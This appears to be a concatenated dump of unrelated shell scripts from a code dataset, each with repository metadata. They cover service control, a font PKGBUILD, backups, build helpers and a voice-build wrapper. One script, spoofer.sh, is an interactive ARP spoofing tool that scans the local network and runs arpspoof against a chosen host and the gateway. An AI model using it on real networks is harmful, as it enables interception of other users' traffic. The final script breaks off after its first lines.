  curl -X POST http://localhost:$APP_PORT/shutdown < /dev/null > /dev/null 2>&1
  # Wait until the server process has shut down, escalating to a kill after
  # ~5 seconds of waiting.
  attempts=0
  while pkill -0 -f $APP_NAME.war > /dev/null 2>&1
  do
    # Use POSIX $(( )); the original's $[ ] arithmetic form is deprecated.
    attempts=$((attempts + 1))
    if [ $attempts -gt 5 ]
    then
      # We have waited too long. Kill it.
      pkill -f $APP_NAME.war > /dev/null 2>&1
    fi
    sleep 1s
  done
}
case $1 in
  start)
    start
    ;;
  stop)
    stop
    ;;
  restart)
    stop
    start
    ;;
esac
exit 0
| true
|
2bcc016189a36ab3c7e00ff07d77c1b486abc432
|
Shell
|
petronny/aur3-mirror
|
/otf-dejavusansmono-powerline-git/PKGBUILD
|
UTF-8
| 1,094
| 3.140625
| 3
|
[] |
no_license
|
# Maintainer: Thomas Ruoff <tomru@ido.cassiopeia.uberspace.de>
pkgname=otf-dejavusansmono-powerline-git
pkgver=20130413
pkgrel=1
pkgdesc="Pre-patched and adjusted version for usage with the new Powerline plugin"
arch=('any')
url='https://github.com/Lokaltog/powerline-fonts/tree/master/DejaVuSansMono'
license=('unknown')
depends=('fontconfig' 'xorg-font-utils')
makedepends=('git')
optdepends=('python-powerline-git: The ultimate statusline/prompt utility'
'python2-powerline-git: The ultimate statusline/prompt utility')
install=${pkgname}.install
source=()
md5sums=('SKIP')
_gitroot='https://github.com/Lokaltog/powerline-fonts'
_gitname='powerline-fonts'
build() {
cd "$srcdir"
msg "Connecting to GIT server..."
if [ -d "${srcdir}/${_gitname}" ]; then
cd "$_gitname" && git pull origin
cd "$srcdir"
msg "The local files are updated."
else
git clone --depth=1 "$_gitroot" "$_gitname"
fi
msg "GIT checkout done or server timeout"
}
package() {
cd "${srcdir}/${_gitname}/DejaVuSansMono"
local font='DejaVu Sans Mono for Powerline.otf'
install -Dm644 "$font" "${pkgdir}/usr/share/fonts/OTF/$font"
}
| true
|
e55e6b24e71ec6df4139834796dbbd18f30ab836
|
Shell
|
jhhwang4195/zinst_making_tool
|
/package_listup
|
UTF-8
| 2,450
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
BaseRoot=`cat /usr/bin/zinst |grep "^ZinstBaseRoot=" | awk -F'=' '{print $2}' | sed -s 's/"//g'`
DistDir=$BaseRoot/dist
cd $DistDir
List=`ls -l |egrep "\.zinst" |awk '{print $9}'`
Listup=`echo $List`
ListupNum=`echo $Listup | awk '{print NF}'`
echo "======================================================"
echo " Package information creating..."
echo " Please hold a sec."
echo "======================================================"
echo "Latest update = `date +%Y.%m.%d` `date +[%T]`" > $DistDir/checker/package_dist_list.info
Count=1
while [ $Count -le $ListupNum ]
do
PackageP=`echo $Listup | awk '{print $'$Count'}'`
Pack_name=`echo $PackageP | awk -F '-' '{print $1}'`
tar zxfp $PackageP $Pack_name.zicf
### Find Package name
head -14 $Pack_name.zicf |sed -e 's/ = /=/g' > $DistDir/checker/package_dist_listing
### Fetch a dependecy file list
CheckRequireRaw=`cat $Pack_name.zicf |grep "^ZINST requires pkg "| awk '{print $4}'`
CheckRequire=`echo $CheckRequireRaw`
### Move a zicf file to Dist dir
mv $Pack_name.zicf $DistDir/checker/
### Parse a Key value for the Dist
echo "echo \"| \$PACKAGENAME | \$VERSION | \$AUTHORIZED | \$CUSTODIAN | \$DESCRIPTION | $CheckRequire |@ \" " >> $DistDir/checker/package_dist_listing;
sed -i "/^FILE/d" $DistDir/checker/package_dist_listing
sed -i "/^CONF/d" $DistDir/checker/package_dist_listing
sed -i "/^SYMB/d" $DistDir/checker/package_dist_listing
sed -i "/^CRON/d" $DistDir/checker/package_dist_listing
sed -i "/^COMM/d" $DistDir/checker/package_dist_listing
chmod 755 $DistDir/checker/package_dist_listing;
ExistPkg=`sh $DistDir/checker/package_dist_listing | awk '{print $2}'`
### Package maintenance list create
sed -i "/^| $ExistPkg/d" $DistDir/checker/package_dist_list.info
#sh $DistDir/checker/package_dist_listing
sh $DistDir/checker/package_dist_listing >> $DistDir/checker/package_dist_list.info
rm -f $DistDir/checker/package_dist_listing
WatchC=`echo $Count |grep "0"`
if [[ $WatchC != "" ]]
then
echo "======================================================"
echo " $Count Package done "
echo "======================================================"
fi
let Count=Count+1
done
echo " "
echo " "
echo "======================================================"
echo " $ListupNum Package(s) Information had been created"
echo "======================================================"
| true
|
cd5f07816f96b81162b34259f8d11d5dc41c1109
|
Shell
|
wilke/M5nr-deprecated
|
/ReleaseTools/mkworkdir
|
UTF-8
| 3,171
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/sh
########################################################################
# mkworkdir
#
# Makes a work area in which to check out packages, build, test, etc.
# This simply makes a directory, copies a top-level makefile into it from
# the release, and installs a set of directories and a config file assumbed
# by the build tools
#
# Usage:
# mkworkdir -r <releaseName> <workDirName>
#
# Assumes:
# RTROOT is set to point to the root of the release area. Releases
# live in $RTROOT/dist/releases
#
# History:
# 01 Dec 03 efrank First version. With thanks to Terry Hung and
# Bob Jacobsen (newrel in SoftRelTools. SLAC/LBL)
#
########################################################################
#++ params
# name of the package with release tools
releasetoolsname=ReleaseTools
#++ vars
baserelname=current
#-----------------------------------------------------------------------
#++ process options
set -- `getopt r: $*`
if [ $? = 0 ]; then
while [ $1 != -- ]
do
case $1 in
-r) baserelname=$2; shift;;
esac
shift
done
shift
fi
#-----------------------------------------------------------------------
#++ check for correct number of arguments
if [ "$#" -ne 1 ]; then
echo "One argument required"
echo "Usage: mkworkdir -r <releaseName> <workDirName>"
exit 2
fi
workdirname=$1
#-----------------------------------------------------------------------
#++ Makesure the work directory does not already exist
if [ -r $workdirname ]; then
echo $workdirname already exists
exit 2
fi
#-----------------------------------------------------------------------
#++ Find Base release
if [ -z "$RTROOT" ]; then
echo "No RTROOT set"
exit 2
fi
baserel=$RTROOT/dist/releases/$baserelname
if [ ! -r "$baserel" ]; then
echo "No such release: " $baserel
exit 2
fi
#-----------------------------------------------------------------------
#++ Make sure the ReleaseTools package is there (to get top level
# makefiles, etc.).
if [ ! -r "$baserel/$releasetoolsname" ]; then
echo "No $releasetoolsname" in the base release
exit 2
fi
releasetools=$baserel/$releasetoolsname
#-----------------------------------------------------------------------
#++ Make sure the top level makefile is there
if [ ! -r $releasetools/Makefile.top ]; then
echo "Invalid $releasetools: no top level makefile"
exit 2
fi
#-----------------------------------------------------------------------
#++ Make the directory structure
mkdir $workdirname
cd $workdirname
#mkdir bin
#mkdir bin/$RTARCH
#mkdir lib
#mkdir lib/$RTARCH
#mkdir tmp
#mkdir tmp/$RTARCH
#mkdir CGI
cp -p $releasetools/Makefile.top ./Makefile
echo "baserelname=$baserelname" > rtConfig
make installdirs
#-----------------------------------------------------------------------
#++ debug...delete real soon
echo "baserel : " $baserel
echo "baserelname : " $baserelname
echo "releasetools: " $releasetools
echo "workdirname : " $workdirname
| true
|
d42e51734c3d05acef999a7feefdb80ea578ad64
|
Shell
|
youm59/dotfiles
|
/post-kaos-install.sh
|
UTF-8
| 1,202
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
# Small personnal script to run just after kaos install
# VARIABLES
Savef=mermouy.dot
Sext=tar.bz2
Source=/media/Remise/save
Wkdir=/tmp
# Gist files to retrieve
Pkgbproto=https://gist.githubusercontent.com/kaos-addict/0a8b0f46713a9dadd4c2/raw/f0a1afb05d7f7a53889bb3847c0f860f1035318a/kaos-pkgbuild-commented-proto
# Extract savefiles
cd $Wkdir
case $Sext in
tar.bz2) tar -xvjf $Source/$Savef.$Sext || echo "Problem while extracting tar.bz2 savefiles";;
tar.gz) tar -xvzf $Source/$Savef.$Sext || echo "Problem while extracting tar.gz savefiles";;
tar.xz) tar -xvJf $Source/$Savef.$Sext || echo "Problem while extracting tar.xz savefiles";;
esac
### Bashfiles
for bf in $(ls bash*)
do
bfname=$(basename $bf)
cp -f $bf $HOME/.$bfname
chown $USER:users $HOME/.$bfname
chmod 744 $HOME/.$bfname
done
### TODO: Other dot files
### TODO: confirmation dialog (qarma?)
# .config dir TODO:and personnal stuff
rsync --remove-source-files .config/ $HOME/.config/ && find -type d -empty -delete
### Get bunch of gist files helpers
# KaoS PKGBUILD prototype file
wget $Pkgbproto && kdesu mv kaos-pkgbuild-commented-proto /usr/share/pacman/PKGBUILD.commented.proto
| true
|
2264139b1a74163b8980f3f62f248acb25f31361
|
Shell
|
sosokill59/Spoofer
|
/spoofer.sh
|
UTF-8
| 2,991
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/bash
function liste() {
sudo arp-scan --interface=$interface --localnet > listeip.txt
nb=$(grep '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' listeip.txt | grep -v $(route -n | tail +3 | head -n1 | awk '{print $2 }') | grep -v $(hostname -I | cut -d " " -f 1) | wc -l )
echo "$nb Machines dans le réseau: "
grep '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' listeip.txt | grep -v $(route -n | tail +3 | head -n1 | awk '{print $2 }') | grep -v $(hostname -I | cut -d " " -f 1)
for var in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' listeip.txt | grep -v $(route -n | tail +3 | head -n1 | awk '{print $2 }') | grep -v $(hostname -I | cut -d " " -f 1) )
do
tab[i]=$var
((i++))
done
}
function spoof() {
echo "Entrez IP: "
read ip
existe=0
for iptab in ${tab[@]}
do
if [[ $ip == $iptab ]]
then
existe=1
fi
done
while [[ $existe -ne 1 ]]
do
echo "La machine n'existe pas ou n'est pas valide entrez une nouvelle IP : "
read ip
for iptab in ${tab[@]}
do
if [[ $ip == $iptab ]]
then
existe=1
fi
done
done
echo "Lancement Interface Xterm "
xterm -e "arpspoof -i $interface -t $ip -r $(route -n | tail +3 | head -n1 | awk '{print $2}') ; $SHELL" &
}
function verif(){
check=1
dsniff=$(dpkg-query -W -f='${Status}' dsniff 2>/dev/null)
arpscan=$(dpkg-query -W -f='${Status}' arp-scan 2>/dev/null)
xterm=$(dpkg-query -W -f='${Status}' xterm 2>/dev/null)
if [[ $dsniff != *"ok"* ]]
then
$check = 0
echo "Install dsniff"
fi
if [[ $arpscan != *"ok"* ]]
then
$check = 0
echo "Install arpscan"
fi
if [[ $xterm != *"ok"* ]]
then
$check = 0
echo "Install xterm"
fi
}
verif
if [[ $check == 1 ]]
then
root=$(whoami)
if [[ $root != "root" ]]
then
echo "Need to be root "
else
routage=$(cat /proc/sys/net/ipv4/ip_forward )
echo " "
echo "Routage des paquets: $routage"
echo Adresse Local: $(hostname -I | cut -d " " -f 1)
echo Adresse Router: $(route -n | tail +3 | head -n1 | awk '{print $2 }')
echo "Liste interfaces:"
echo " "
tab=[]
element=$(ifconfig | grep "RUNNING" | cut -d " " -f 1 | cut -d ":" -f 1)
i=0
for var in $element
do
tab[$i]=$var
echo "$i : $var"
((i++))
done
echo " "
echo "Entrez le numéro de l' interface (0-$(($i-1)))":
read id
while (( $id < 0 || $id > $(($i-1)) ))
do
echo Entrez un numéro valide interface:
read id
done
interface=${tab[$(($id))]}
echo Choice : $interface
liste
echo "Voulez vous re-scanner ? OUI - NON "
read choix
while [[ $choix == "OUI" || $choix == "oui" ]]
do
liste
echo "Voulez vous re-scanner ? OUI - NON "
read choix
done
spoof
echo "Voulez-vous spoofer une autre machine ? OUI - NON "
read rep
while [[ $rep == "OUI" || $rep == "oui" ]]
do
liste
spoof
echo "Voulez-vous spoofer une autre machine ? OUI - NON "
read rep
done
fi
fi
| true
|
f3a0741d50a7674919f27a0d18f9da6e0183d764
|
Shell
|
jandado/hass-smartbox
|
/scripts/pre-commit-check.sh
|
UTF-8
| 824
| 3.109375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
function manifest_version() {
sed -n -e 's/^.*"version": "\([0-9\.]\+\)".*$/\1/p' custom_components/smartbox/manifest.json
}
function changelog_version() {
sed -n -e 's/^.*## \([0-9\.]\+\).*$/\1/p' CHANGELOG.md | head -1
}
function manifest_smartbox_version() {
sed -n -e 's/^.*\(smartbox[=><]\+[0-9\.]\+\).*$/\1/p' custom_components/smartbox/manifest.json
}
function requirements_smartbox_version() {
sed -n -e 's/^.*\(smartbox[=><]\+[0-9\.]\+\).*$/\1/p' requirements.txt
}
if [[ $(manifest_version) != $(changelog_version) ]]
then
echo "Manifest version does not match changelog" >&2
exit 1
fi
if [[ $(manifest_smartbox_version) != $(requirements_smartbox_version) ]]
then
echo "Manifest smartbox version does not match requirements smartbox version" >&2
exit 1
fi
| true
|
5280766f96e40a2ed77dadd4d1bb78da149df1b9
|
Shell
|
rynge/ariella
|
/jetstream/salt/htcondor/master_shutdown_script.sh
|
UTF-8
| 317
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
# ignore shutdown in the beginning of the uptime - let's the system settle down
UPTIME=`cat /proc/uptime | sed 's/[\. ].*//'`
if [ $UPTIME -lt 1800 ]; then
exit 0
fi
if [ -e /tmp/do-not-shutdown ]; then
exit 0
fi
logger "Shutting down node due to lack of work!"
/sbin/shutdown -h now
exit 0
| true
|
6945d3b6f895c58cb6e41f70863dad67389ae48f
|
Shell
|
Cloudxtreme/dotfiles-26
|
/scripts/backup.sh
|
UTF-8
| 7,106
| 3.625
| 4
|
[
"Unlicense"
] |
permissive
|
#!/bin/sh
mountables=(
"/mnt/vortex"
"/mnt/raidstorage"
"/mnt/xfsmedia"
)
backup_source_dirs=(
"/home/panther/docs"
"/home/panther/docs"
"/home/panther/media/pictures"
"/home/panther/media/pictures"
"/mnt/raidstorage/media/audio"
"/mnt/raidstorage/media/video"
"/mnt/ssdstorage/music"
"/mnt/ssdstorage/music"
)
backup_dest_dirs=(
"${mountables[1]}/backups/docs"
"${mountables[0]}/backups/docs"
"${mountables[1]}/backups/pictures"
"${mountables[0]}/backups/media/pictures"
"${mountables[0]}/backups/media/audio"
"${mountables[0]}/backups/media/video"
"${mountables[0]}/backups/media/music"
"${mountables[2]}/music"
)
systembackupdir="${mountables[1]}/backups/system/"
systembackupdir2="${mountables[0]}/backups/system/"
virtualmachinesdir="/opt/virtualmachines/"
logdir="/var/log/backup/"
# Escape asterisks, otherwise shell expansion is made.
systembackupexcludelist=(
"/sys/\*"
"/proc/\*"
"/dev/shm/\*"
"/tmp/\*"
"/var/tmp/\*"
"/mnt/dvd/\*"
"/mnt/exports/\*"
"/mnt/misc/\*"
"/mnt/phone/\*"
"/mnt/raidstorage/\*"
"/mnt/ssdstorage/\*"
"/mnt/storage1/\*"
"/mnt/storage2/\*"
"/mnt/vortex/\*"
"/mnt/xfsmedia/\*"
"/home/\*"
"/usr/portage/distfiles/\*"
"$virtualmachinesdir\*.img"
"$virtualmachinesdir\*.qcow2"
"$virtualmachinesdir\*.iso"
)
homebackupexcludelist=(
"/home/panther/docs/\*"
"/home/panther/media/pictures/\*"
"/home/panther/misc/\*"
"/home/panther/ramdisk/\*"
)
if test "$(echo $HOME)" != "/root"
then echo You must be root to maintain permissions!
exit
fi
echo "Mounting partitions if not already mounted..."
for mountable in ${mountables[@]}
do
if test "empty$(cat /etc/mtab | grep $mountable)" == "empty"
then mount $mountable 2>/dev/null &
fi
done
wait
for mountable in ${mountables[@]}
do
if test "empty$(cat /etc/mtab | grep $mountable)" == "empty"
then echo "Mounting $mountable failed."
sleep 1
fi
done
echo "Starting backup in three seconds..."
sleep 1
echo "Starting backup in two seconds..."
sleep 1
echo "Starting backup in one second..."
sleep 1
# If pigz is found, use threaded compression.
if [ $(which pigz 2>/dev/null) ]
then
parallel=1
else
parallel=0
fi
datestring=$(date +%F)
echo
echo "*******************************************************************************"
echo "Synchronising misc backup directories..."
num_of_misc=${#backup_source_dirs[@]}
if [ $num_of_misc -ne ${#backup_dest_dirs[@]} ]
then
echo "The number of misc backup source and destination directories does not match!"
echo "Aborting..."
exit 1
fi
index=0
while [ $index -lt $num_of_misc ]
do
sourcedir="${backup_source_dirs[$index]}/"
destdir="${backup_dest_dirs[$index]}/"
if ! [ -e $destdir ]
then
echo "Destination directory $destdir does not exist, skipping..."
else
echo
echo "*******************************************************************************"
echo "Synchronising $sourcedir with $destdir..."
rsync -ah --progress --delete --log-file "$logdir""$datestring""_rsync_""$index"".log" $sourcedir $destdir
fi
index=$(expr $index + 1)
done
if test "X$1" == "Xmisconly"
then
exit
fi
if ! [ -e $systembackupdir ]
then
echo "System backup directory $systembackupdir does not exist."
echo "Aborting system backup..."
exit
fi
if test "X$1" != "Xsynconly"
then
echo
echo "*******************************************************************************"
echo "Beginning system backup..."
echo "To restore: tar -C /[home] -xvpzf archive.tgz"
mbrbackupfile="$systembackupdir/$HOSTNAME-MBR-backup-$datestring.bak"
systembackupfile="$systembackupdir/$HOSTNAME-system-backup-$datestring.tgz"
homebackupfile="$systembackupdir/$HOSTNAME-home-backup-$datestring.tgz"
dd if=/dev/sda of=$mbrbackupfile bs=512 count=1
echo
echo "MBR backup created."
excludelist=""
for excludeitem in ${systembackupexcludelist[@]}
do
# Prefix every item with . so that we may use relative paths with tar.
excludelist="$excludelist --exclude=.$excludeitem"
done
excludelist=$(echo $excludelist | sed "s/\\\\\*/*/g")
echo
echo "Creating system backup, see /dev/shm/backup.out for progress."
if [ $parallel -eq 1 ]
then
tar -C / --index-file /dev/shm/backup.out $excludelist -cvpf - ./ | pigz -c > $systembackupfile
else
tar -C / --index-file /dev/shm/backup.out $excludelist -cvpzf $systembackupfile ./
fi
echo "Moving log file to $logdir..."
mv /dev/shm/backup.out $logdir
distfilesdir=$systembackupdir/distfiles/
echo
echo "Backing up distfiles..."
if ! [ -d $distfilesdir ]
then
if [ -e $distfilesdir ]
then
echo "$distfilesdir exists but is not a directory! Aborting..."
exit 1
fi
mkdir $distfilesdir
fi
rsync -ah --progress --delete /usr/portage/distfiles/ $distfilesdir
excludelist=""
for excludeitem in ${homebackupexcludelist[@]}
do
# Prefix every item with . so that we may use relative paths with tar.
excludelist="$excludelist --exclude=.$excludeitem"
done
excludelist=$(echo $excludelist | sed "s/\\\\\*/*/g")
echo
echo "*******************************************************************************"
echo "Backing up home directories..."
if [ $parallel -eq 1 ]
then
tar -C / --one-file-system -cpf - $excludelist ./home | pigz -c > $homebackupfile
else
tar -C / --one-file-system -cpzf $homebackupfile $excludelist ./home
fi
if test "X$1" != "Xnovms"
then
vm_backupdir="$systembackupdir""vm_images/"
echo
echo "*******************************************************************************"
echo "Backing up virtual machine images..."
if ! [ -d $vm_backupdir ]
then
if [ -e $vm_backupdir ]
then
echo "$vm_backupdir exists but is not a directory! Aborting..."
exit 1
fi
mkdir $vm_backupdir
fi
if [ $parallel -eq 1 ]
then
gzipexe="pigz"
else
gzipexe="gzip"
fi
find $virtualmachinesdir -regex ".*\.img\|.*\.qcow2\|.*\.iso" -printf "%f\n" | xargs -I {} sh -c "$gzipexe -c $virtualmachinesdir'{}' > $vm_backupdir'{}'.gz"
fi
fi
if test "empty$systembackupdir2" != "empty"
then
echo
echo "*******************************************************************************"
echo "Synchronizing $systembackupdir with $systembackupdir2..."
if ! [ -e $systembackupdir2 ]
then
echo "Destination directory $destdir does not exist, skipping..."
else
rsync -avh --progress --delete $systembackupdir $systembackupdir2
fi
fi
echo
echo "*******************************************************************************"
echo "All done!"
echo
read
| true
|
98850ccf6738791af8f2f7eab1e82b6c1001717c
|
Shell
|
gregoryjjb/cs160
|
/install.sh
|
UTF-8
| 2,343
| 3.34375
| 3
|
[] |
no_license
|
# start from inside cs160 folder.
# Will add a directory at the same level as the cs160 folder for OpenFace
cd ..
# Exit script if any command fails
set -e
set -o pipefail
if [ $# -ne 0 ]
then
echo "Usage: install.sh"
exit 1
fi
# install FFMPEG
sudo apt-get -y install ffmpeg
# Install OpenFace and all of it's dependencies
git clone https://github.com/TadasBaltrusaitis/OpenFace
cd OpenFace
# Essential Dependencies
echo "Installing Essential dependencies..."
sudo apt-get -y update
sudo apt-get -y install build-essential
sudo apt-get -y install llvm
sudo apt-get -y install clang-3.8 libc++-dev libc++abi-dev
sudo apt-get -y install cmake
sudo apt-get -y install libopenblas-dev liblapack-dev
sudo apt-get -y install git libgtk2.0-dev pkg-config libavcodec-dev libavformat-dev libswscale-dev
sudo apt-get -y install python-dev python-numpy libtbb2 libtbb-dev libjpeg-dev libpng-dev libtiff-dev libdc1394-22-dev checkinstall
echo "Essential dependencies installed."
# OpenCV Dependency
echo "Downloading OpenCV..."
wget https://github.com/opencv/opencv/archive/3.4.0.zip
unzip 3.4.0.zip
cd opencv-3.4.0
mkdir -p build
cd build
echo "Installing OpenCV..."
cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local -D FORCE_VTK=ON -D WITH_TBB=ON -D WITH_V4L=ON -D WITH_OPENGL=ON -D WITH_GDAL=ON -D WITH_XINE=ON -D WITH_CUDA=OFF ..
make -j4
sudo make install
cd ../..
rm 3.4.0.zip
sudo rm -r opencv-3.4.0
echo "OpenCV installed."
# Boost C++ Dependency
echo "Installing Boost..."
sudo apt-get install libboost-all-dev
echo "Boost installed."
# Dlib dependency
# OpenCV is supposed to download this for us, but I coudln't get their install to work
echo "Installing dlib..."
wget http://dlib.net/files/dlib-19.6.tar.bz2
tar xvf dlib-19.6.tar.bz2
cd dlib-19.6/
mkdir build
cd build
cmake ..
cmake --build . --config Release
sudo make install
sudo ldconfig
cd ../..
echo "dlib installed."
# OpenFace installation
echo "Installing OpenFace..."
mkdir -p build
cd build
cmake -D CMAKE_BUILD_TYPE=RELEASE ..
sudo make install
cd ../..
echo "OpenFace successfully installed."
# Install our processing application
echo "Installing processing application..."
cd cs160/CVProcessor
make CONF=Release
cd ../..
sudo rm -rf OpenFace
cd cs160
echo "Processing application installed. Located in cs160/CVProcessor/dist/Release"
| true
|
d93a98c0a1a29c1763f0de788c7c658a7977d4f2
|
Shell
|
pseudoPixels/SciWorCS
|
/app_collaborative_sci_workflow/GalaxyToolBase/phenotype_association/lps_tool_wrapper.sh
|
UTF-8
| 1,142
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# script for execution of deployed applications
#
# Sets up the MCR environment for the current $ARCH and executes
# the specified command.
#
export PATH=$PATH:$(dirname $0)
MCRROOT=${MCRROOT:-/galaxy/software/linux2.6-x86_64/bin/MCR-7.11/v711}
MWE_ARCH=glnxa64
if [ "$MWE_ARCH" = "sol64" ] ; then
LD_LIBRARY_PATH=.:/usr/lib/lwp:${MCRROOT}/runtime/glnxa64
else
LD_LIBRARY_PATH=.:${MCRROOT}/runtime/glnxa64
fi
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRROOT}/bin/glnxa64
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRROOT}/sys/os/glnxa64
if [ "$MWE_ARCH" = "maci" -o "$MWE_ARCH" = "maci64" ]; then
DYLD_LIBRARY_PATH=${DYLD_LIBRARY_PATH}:/System/Library/Frameworks/JavaVM.framework/JavaVM:/System/Library/Frameworks/JavaVM.framework/Libraries
else
MCRJRE=${MCRROOT}/sys/java/jre/glnxa64/jre/lib/amd64
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRJRE}/native_threads
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRJRE}/server
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRJRE}/client
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRJRE}
fi
XAPPLRESDIR=${MCRROOT}/X11/app-defaults
export LD_LIBRARY_PATH XAPPLRESDIR
lps_tool $*
exit 0
| true
|
7de8549932dc0dcd9949c394183fdd895c7152d5
|
Shell
|
DaemonDave/CFront-3.0.3.1
|
/bat/00-CLEAN.sh
|
UTF-8
| 859
| 2.515625
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
rm LOG.0? 2> /dev/null
rm cfront cfront.old munch munch.old libC.a libC.a.old 2> /dev/null
[ -L incl ] && rm incl
make -C src clean 2> /dev/null
make -C scratch clean 2> /dev/null
rm lib/mk/*.o lib/mk/*..c 2> /dev/null
rm lib/complex/mk/*.o lib/complex/mk/*.a lib/complex/mk/*..c 2> /dev/null
D=demo/hello
rm $D/hello.i $D/hello..c $D/hello.o $D/hello..o 2> /dev/null
rm $D/hello.tmp 2> /dev/null
rm $D/hello.cdts..c $D/hello.cdts.o $D/a.out 2> /dev/null
rm $D/hello 2> /dev/null
rm $D/c++_c_output..c $D/c++_c_output_C $D/c++_c_output_c 2> /dev/null
make -C tools/demangler clobber 2> /dev/null
make -C tools/pt clobber 2> /dev/null
rm ptcomp ptlink c++filt 2> /dev/null
make -C lib/complex/mk clean 2> /dev/null
rm libcomplex*.a 2> /dev/null
for i in *.sh; do
[ -L $i ] && rm $i
done
[ -L CC ] && {
rm CC
ln -s CC3 CC
}
| true
|
d1e3f5a9db8e61195753b6558eab5c130c7ff132
|
Shell
|
allan-zhou/shelldemo
|
/docker/rm-container.sh
|
UTF-8
| 574
| 3.9375
| 4
|
[] |
no_license
|
#! /bin/bash
# 删除所有的docker container
COUNT=0
function rmContainers(){
CONTAINER_IDS=$(docker ps -aq)
echo
if [ -z "$CONTAINER_IDS" -o "$CONTAINER_IDS" = " " ]; then
echo "========== No containers available for deletion =========="
else
for container_id in $CONTAINER_IDS
do
let "COUNT += 1"
done
echo "========== 共 $COUNT 个容器 =========="
docker rm -f $CONTAINER_IDS
echo "所有容器以成功删除"
fi
echo
}
rmContainers
| true
|
82282f321fde25ad123c3b73ad9330b6d294ff92
|
Shell
|
techiaith/docker-marytts
|
/voicebuilder/egs/lleisiwr/build.sh
|
UTF-8
| 485
| 2.953125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
CWD_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
while getopts u: flag
do
case "${flag}" in
u) userid=${OPTARG};;
esac
done
${MARYTTS_HOME}/target/marytts-${MARYTTS_VERSION}/bin/marytts-server &
rm -rf /voices/${userid}_cy
mkdir -p /voices/${userid}_cy/data
cp -v /data/lleisiwr/${userid}/* /voices/${userid}_cy/data/
python3 ${CWD_DIR}/../../scripts/python/voice_build.py -s /voices/${userid}_cy/data -v ${userid}_cy -l cy
| true
|
2a398a838b8728711723d49fe17a5228e64d377a
|
Shell
|
syncthing/website
|
/build.sh
|
UTF-8
| 418
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
set -euo pipefail
mkdir -p functions
pushd functions-src
for d in * ; do
pushd "$d"
go build -o "../../functions/$d"
popd
done
popd
pushd script
go run . > ../themes/default/layouts/partials/github-sponsors.html
popd
rel=$(curl -s https://api.github.com/repos/syncthing/syncthing/releases/latest \
| grep tag_name \
| awk '{print $2}' \
| tr -d \",v)
echo "stable: $rel" > data/release.yaml
hugo
| true
|
1ada9c994c86b7566c61eb5ceb64a685fc1bc7d0
|
Shell
|
mrdnewman/bash
|
/lck_SysAccts.sh
|
UTF-8
| 392
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# -- Lock down system accounts ...
# -- lksysacct.sh
SCRIPT_NAME=`basename $0`;
for user in `awk -F: '($3 < 500) {print $1 }' /etc/passwd`; do
if [ $user != "root" ]; then
/usr/sbin/usermod -L $user
fi
if [ $user != "sync" ] && [ $user != "shutdown" ] && [ $user != "halt" ]; then
/usr/sbin/usermod -s /sbin/nologin $user
fi
done
| true
|
f12f45dc8209127407937846b44ef7c432872c32
|
Shell
|
dmlb2000/torque-cookbook
|
/test.sh
|
UTF-8
| 715
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash -x
DIST=${1:-centos-72}
berks install
rm -rf test/integration/playground/cookbooks/*
berks vendor test/integration/playground/cookbooks
pushd test/integration/playground
knife upload --server-url http://192.168.121.1:8889 cookbooks data_bags environments roles
popd
for i in 0 1 ; do
echo "sudo chef-client -r 'role[torque-server],recipe[torque::server]'" | kitchen login server-$DIST
echo "sudo chef-client -r 'role[torque-clients],recipe[torque::client]'" | kitchen login client-$DIST
echo "sudo chef-client -r 'role[torque-compute],recipe[torque::compute]'" | kitchen login c0-$DIST
echo "sudo chef-client -r 'role[torque-compute],recipe[torque::compute]'" | kitchen login c1-$DIST
done
| true
|
3b7647044078cdcf96c47c21b688cf064b06e536
|
Shell
|
ii-lo/pelp
|
/install-ruby.sh
|
UTF-8
| 227
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
source /home/vagrant/.rvm/scripts/rvm # changed, used to be /usr/local/rvm/scripts/rvm
rvm use --default --install $1 # changed, used to not set --default
shift
if (( $# ))
then gem install $@
fi
| true
|
4e7eaca030f4a43a77b336007d94f2a26965a48c
|
Shell
|
gman999/bitrig-ports
|
/net/smokeping/pkg/smokeping_fcgi.rc
|
UTF-8
| 406
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/sh
#
# $OpenBSD: smokeping_fcgi.rc,v 1.1 2014/11/05 15:42:09 sthen Exp $
daemon="${TRUEPREFIX}/bin/smokeping_cgi"
daemon_flags="${SYSCONFDIR}/config"
. /etc/rc.d/rc.subr
pexp="/usr/bin/perl ${daemon}${daemon_flags:+ ${daemon_flags}}"
rc_reload=NO
rc_start() {
${LOCALBASE}/bin/spawn-fcgi -s /var/www/run/smokeping.sock \
-u _smokeping -U www -M 0660 ${daemon} ${daemon_flags}
}
rc_cmd $1
| true
|
94d73c27e5e0296be6e2dfdd5f80450a7e797544
|
Shell
|
hanwei7788/LM-auto
|
/automatedtesting/linkmotion-dev-tools/hardware-setup/write_usb_image.sh
|
UTF-8
| 1,123
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
# params:
